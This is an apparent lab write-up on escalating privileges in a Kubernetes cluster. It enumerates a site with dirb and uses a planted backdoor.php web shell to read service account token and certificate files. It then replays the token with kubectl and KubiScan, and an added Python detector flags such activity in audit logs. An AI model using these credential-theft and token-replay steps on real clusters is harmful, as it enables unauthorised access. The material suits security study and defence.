.:: [KUBERNETES] Exploitation 2 ::.
Title : [KUBERNETES] Exploitation 2
Author : Cabir  
Date : Friday, Sep 13, 2019
Modified : Friday, Sep 13, 2019
Reading time: 0 minutes and 24 seconds.

-=[Privilege escalation with malicious pod 2]=-

FingerPrint

    dirb http://10.23.58.40:30677/ /usr/share/dirb/wordlists/big.txt
    dirb http://10.23.58.40:30677/ /usr/share/dirb/wordlists/big.txt -X .php

Result --> backdoor.php

Got an RCE with backdoor.php

    ls /run/secrets/kubernetes.io/serviceaccount
    cat /run/secrets/kubernetes.io/serviceaccount/token
    cat /run/secrets/kubernetes.io/serviceaccount/ca.crt
    cat /run/secrets/kubernetes.io/serviceaccount/namespace

Or:

    http://10.23.58.40:30677/backdoor.php?d=/run/secrets/kubernetes.io/serviceaccount/token
    http://10.23.58.40:30677/backdoor.php?d=/run/secrets/kubernetes.io/serviceaccount/ca.crt
    http://10.23.58.40:30677/backdoor.php?d=/run/secrets/kubernetes.io/serviceaccount/namespace

On your computer, download kubectl:

    curl -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl
    chmod +x kubectl   # make the downloaded binary executable

Try to get pods:

    ./kubectl --token="$(cat jwt.token)" --certificate-authority=ca.crt --server=https://10.23.58.40:6443 get pods

Response:

    Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:mktg:wordpress" cannot list resource "pods" in API group "" in the namespace "default"
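
Defender-side view of the step above, as an added example that is not part of the original writeup: when API server audit logging is enabled, the Forbidden response is recorded together with the service account name and the caller's source IP, so a mounted token replayed from outside the cluster stands out. The audit events, the source addresses, the pod CIDR 10.244.0.0/16 and the function name are constructed assumptions.

```python
import ipaddress
import json

# Assumption: the cluster's pod network; replace with the real pod CIDR.
POD_CIDR = ipaddress.ip_network("10.244.0.0/16")

# Constructed audit.k8s.io/v1 events, one JSON object per line (not real logs).
SAMPLE_AUDIT_LOG = "\n".join([
    '{"verb":"list","user":{"username":"system:serviceaccount:mktg:wordpress"},'
    '"sourceIPs":["10.23.58.99"],"objectRef":{"resource":"pods","namespace":"default"},'
    '"responseStatus":{"code":403}}',
    '{"verb":"get","user":{"username":"system:serviceaccount:mktg:wordpress"},'
    '"sourceIPs":["10.244.1.17"],"objectRef":{"resource":"configmaps","namespace":"mktg"},'
    '"responseStatus":{"code":200}}',
    '{"verb":"list","user":{"username":"kubernetes-admin"},'
    '"sourceIPs":["10.23.58.5"],"objectRef":{"resource":"pods","namespace":"default"},'
    '"responseStatus":{"code":200}}',
    'truncated, non-JSON line',
])

def suspicious_sa_events(log_text, pod_cidr=POD_CIDR):
    """Flag service-account requests that were denied (403) or that came
    from a source address outside the pod network."""
    findings = []
    for line in log_text.splitlines():
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip damaged lines instead of aborting the scan
        if not isinstance(ev, dict):
            continue
        parts = ev.get("user", {}).get("username", "").split(":")
        if len(parts) != 4 or parts[:2] != ["system", "serviceaccount"]:
            continue  # only service-account identities are of interest here
        reasons = []
        if ev.get("responseStatus", {}).get("code") == 403:
            reasons.append("forbidden")
        for ip in ev.get("sourceIPs", []):
            try:
                outside = ipaddress.ip_address(ip) not in pod_cidr
            except ValueError:
                outside = True  # an unparsable source address is worth a look
            if outside:
                reasons.append("outside-pod-cidr:" + ip)
        if reasons:
            ref = ev.get("objectRef", {})
            findings.append({"serviceaccount": parts[2] + "/" + parts[3],
                             "request": "%s %s in %s" % (ev.get("verb"),
                                 ref.get("resource"), ref.get("namespace")),
                             "reasons": reasons})
    return findings
```

Pods on the host network and NATed traffic show node addresses as the source, so add the node ranges to the allowed networks before alerting on this.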

Kubi-Scan :

    python3 KubiScan/KubiScan.py -ho 10.23.58.40:6443 -t jwt.token -c ca.crt -a

    https://10.23.58.40:6443/version
    https://10.23.58.40:10250/pods
    https://10.23.58.40:10250/healthz
    https://10.23.58.40:10250/logs

